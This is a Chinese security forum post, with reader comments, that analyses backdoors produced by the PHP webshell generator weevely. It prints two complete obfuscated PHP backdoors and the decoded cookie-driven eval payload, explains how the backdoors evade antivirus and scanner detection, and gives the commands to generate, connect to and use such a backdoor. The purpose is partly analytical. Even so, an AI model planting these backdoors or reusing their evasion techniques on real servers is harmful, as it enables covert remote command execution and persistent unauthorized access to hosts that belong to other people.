PHP后门生成工具weevely分析

2012-10-19 11:07:31 39 1394


最近闲的蛋疼,玩了下weevely这个工具,感觉还是蛮强大的,防查杀,连接也是加密的。感兴趣的朋友看正文吧。

0x01 摘要
      weevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替web 页面式的管理,weevely生成的服务器端php代码是经过了base64编码的,所以可以骗过主流的杀毒软件和IDS,上传服务器端代码后通常可以通过weevely直接运行。
      weevely所生成的PHP后门所使用的方法是现在比较主流的base64加密结合字符串变形技术,后门中所使用的函数均是常用的字符串处理函数,被作为检查规则的eval,system等函数都不会直接出现在代码中,从而可以致使后门文件绕过后门查找工具的检查。使用暗组的Web后门查杀工具进行扫描,结果显示该文件无任何威胁,如下图。

      在本篇文章中,将针对其所生成的PHP后门进行分析,浅析其绕过后门查杀工具的原理,以及其运行与客户端交互的执行过程。
0x02 后门代码分析
      先看下这个工具在相同条件下生成的两个后门的代码,
backdoor1.php
<?php
$jr="e2luaVay9zZXQoJ2Vycaym9yX2xvayZycsayICaycvZGV2L251bGwnKTsaykayaayz0nayc3QnO2VjaG8aygJzwnLiRrLic+Jzt";
$pxn="ldmayFaysKayGJhcay2U2NF9kZWNvZGayUocHJlZ19yZXBsYWNlKGFycmF5KCcvW15cdz1cc10vJywnL1ayxzayLyaycpLCBhcnJheSgn";
$gip = str_replace("b","","bsbtbrb_rebplbabcbe");
$pjp="JyaywnKyaycaypLCBqbay2luKayGayFycmF5ayX3NsaWNlKCRhLCRjKCayRhKSay0zKSaykpKSk7ZayWNobyayAnPC8nLiRrLic+Jzt9";
$esx="JayGM9Jay2NvaydW5ay0JzayskYT0kX0NPT0aytJRTtpZihyZXNlaydCgaykYSk9PaySd0ZScgJiayYgJayGMoJGEpPjMpay";
$ld = $gip("bh", "", "bhbbhabhsbhebh6bh4bh_bhdbhebhcobhde");
$zjr = $gip("h","","hchrhehahthe_fhuhnhchthihohn");
$oj = $zjr('', $ld($gip("ay", "", $esx.$jr.$pxn.$pjp))); $oj();
?>
backdoor2.php
<?php
$poj="GJhc2U2NFcgh9kZcghWNvZGUocHJlcghZcgh19yZXBsYWNcghlKGFycmF5KCcvW15cdz1cc10vJywnL1xzLycpLCBhcnJheSgncghJy";
$qir="JGM9J2NvdW50JzskcghYT0kX0NcghPT0tJRTtpZihyZXNldCgkYcghSk9PSd0ZScgJiYgJcghGMoJGEpPjMpe2luaVcgh";
$eg = str_replace("j","","sjtrj_jrjejpjljajcje");
$sh="wnKycpLCBqb2luKGFcghycmF5X3NcghscghaWNlKCRhLCRjKCRhKS0zKSkcghpKSk7ZWNobyAcghnPC8nLiRrLic+Jzt9";
$cfw="9zZXcghQoJ2Vycm9yX2xvZycsICccghvZcghGV2L251cghbGwnKTskaz0nc3QcghnO2VjaG8gJzwnLiRrcghLic+JztldmFsK";
$pf = $eg("z", "", "zbzazse6z4_zdzezcozdze");
$wvu = $eg("w","","cwrwewatwew_wfwuwnwcwtwiwown");
$qfr = $wvu('', $pf($eg("cgh", "", $qir.$cfw.$poj.$sh))); $qfr();
?>
对比两篇代码,首先发现变量名不同,说明变量名是随机生成的,通过多次的生成查看,能够确定变量名是有两到三个随机字符组成的(不包含下划线)。
      下面我们通过backdoor1.php代码来看下,后门程序执行的过程。
      首先定义$jr和$pxn的字符串变量,然后通过str_replace函数去除“bsbtbrb_rebplbabcbe”字符串中的b,赋给$gip,即$gip=str_replace。在此之后,调用str_replace函数时,均用$gip来代替,这样做的目的应该是避免多次出现str_replace,从而导致查杀程序关注。在对比一下backdoor2.php,发现在backdoor.php中这条语句,用“j”代替了“b”,说明这个间隔字符也是随机生成的。
      再向下面看,定义$pjp和$esx字符串变量后,通过前面说的$gip变量执行str_replace函数功能,赋$Id值为base64_decode,赋$zjr值为create_function。和之前的$gip变量一样,间隔字符也是随机生成的。
      最重要的就是最后的这一行代码了,之前的内容都是来为这行的执行进行准备的。我们来分析下它的内容
$oj = $zjr('', $ld($gip("ay", "", $esx.$jr.$pxn.$pjp)));
先将前面我们分析过的变量对照这句中进行下转换
$oj = create_function('', base64_decode(str_replace("ay", "", $esx.$jr.$pxn.$pjp)));
四个字符串变量的内容太长了,自己一个个去找太麻烦了,我修改了下代码,添加这样一条语句
print base64_decode(str_replace("ay", "", $esx.$jr.$pxn.$pjp);
来查看str_replace执行后的样子,结果如下图

      代码内容如下
$c='count';
$a=$_COOKIE;
if(reset($a)=='te' && $c($a)>3)
{
ini_set('error_log', '/dev/null');
$k='st';
echo'<'.$k.'>';
eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));
echo '</'.$k.'>';
}
执行过程为,通过赋予$c值为count,为后面执行count函数做准备,然后提取客户端提交的cookie内容赋给$a。通过判断cookie中第一个内容值是否为te,且cookie内容是否大于3。符合条件则,设置错误日志不保存,定义$k值为st,作为返回数据的开始和结束标识。然后对cookie的倒数第3条内容进行组合和正则替换,下面通过从Wireshark抓取的一条交互数据来说明执行过程。
      抓取的cookie数据内容为
PREF=te; USR=mCvD4rtLQ7ngeBvD; SID=c3lzd&GV; SESSID=?t@K-Cdp; USRID=ZCAyP-i/Yx#J-y?k7
执行过程中将SID,SESSID,USRID的值合并为
c3lzd&GV?t@K-CdpZCAyP-i/Yx#J-y?k7
通过正则替换将非字母数据剔除,空白符数据用“+”替代得到内容:
c3lzdGVtKCdpZCAyPiYxJyk7
base64解密后内容为“system('id 2>&1');”,之后eval执行这条语句,也不用再说什么了。
      代码分析到这里也就差不多了,稍微要提一下的是,我在生成这个PHP后门时,密码设置的是test,所以他在代码中它会校验cookie第一个内容的值是否为te。但是,如果输入tes这样的内容当做密码来连接后门时,会出现错误。抓包分析了下,应该是客户在连接的过程中会有一个加密校验的过程,这个过程是怎么进行的,能力有限,分析不出来。不过可以肯定的是,这个程序生成的后门即使有人得到了我们的PHP后门代码,他们也不能使用。
0x03 Weevely使用方法简介
1.        生成PHP后门
./weevely.py generate test ~/backdoor.php  
/*
这句话的意思是生成一个密码为test的后门文件并保存为用户目录中的
backdoor.php。路径信息也可以省略,如果省略生成文件则放在当前所
在目录下
*/
2.        连接后门
./weevely.py http://127.0.0.1/backdoor.php test
3.        应用内置模块
这里以上传文件为示例,在连接成功后的shell中输入
:file.uplaod /root/exploit.c exploit.c
/*其中第一个参数为本地文件路径(要用绝对路径),第二个参数为远程路径*/
0x04 总结
1.        Weevely比较明显的局限性在于,他只能生成PHP的后门文件
2.        加密连接过程要依赖于客户端。如果在未知密码的情况下,获得后门文件,可以针对这个后门文件自己编写一个简单的客户端,无需密码,也可连接这个后门
3.        检查这种类型的后门难度很大,全篇代码中只出现过一个str_replace函数的使用,其他的函数都是通过变量整合的方法来调用。而且敏感的字符串都会通过随机字符串进行间隔,很难找到其特征,唯一的方法就是从行为上分析,文件是否有害。

关于作者

评论39次

要评论?请先  登录  或  注册
  • 39楼
    2013-7-9 20:22

    测试测试

  • 38楼
    2013-6-18 09:06

    环境变量的问题,weevely的默认环境变量设置都是#!/usr/bin/env python,你试试python weevely.py

  • 37楼
    2013-6-17 16:07

    郁闷,下了个python3.3还是不行。我的系统是win7

  • 36楼
    2013-6-17 15:59

    是不是win下运行不了啊

  • 35楼
    2013-6-17 15:24

    分析相当透彻啊

  • 34楼
    2013-6-17 14:57

    下了个weevely,运行错误。我的python版本是2.7.3。郁闷啊,python版本差异有点大,我好多运用都是2.7.3的,决定不换了。

  • 33楼
    2013-6-17 14:48

    呵呵。。兄弟弄得不错

  • 32楼
    2013-6-14 11:00

    是个好东西啊

  • 31楼
    2013-4-12 17:36

    weevely用过~~不错用下~

  • 30楼
    2013-1-7 14:37

    备用了

  • 29楼
    2012-12-30 17:53

    看来多数都是用base64_decode

  • 28楼
    2012-12-30 17:01

    跟菜刀差不多,学习了

  • 27楼
    2012-12-20 22:20

    请叫我三少

  • 26楼
    2012-12-20 22:14

    截图提到的root,其实一直都是用作客户端的,与服务端的文件权限没有什么关系。。。。

  • 25楼
    2012-12-20 22:11

    加密的思路很值得借鉴,原理分析的很透彻,哈哈,又多学一点

  • 24楼
    2012-12-20 22:04

    root与普通用户涉及到一个文件权限问题,不知道会不会有影响

  • 23楼
    2012-12-20 17:36

    强烈支持少爷!我们是基友!

  • 22楼
    2012-12-20 10:59

    学习了 这个思想懂了之后可以自己改

  • 21楼
    2012-12-18 21:47

    喜欢看这种文章

  • 20楼
    2012-12-16 01:03

    在bt下一直都只用root.....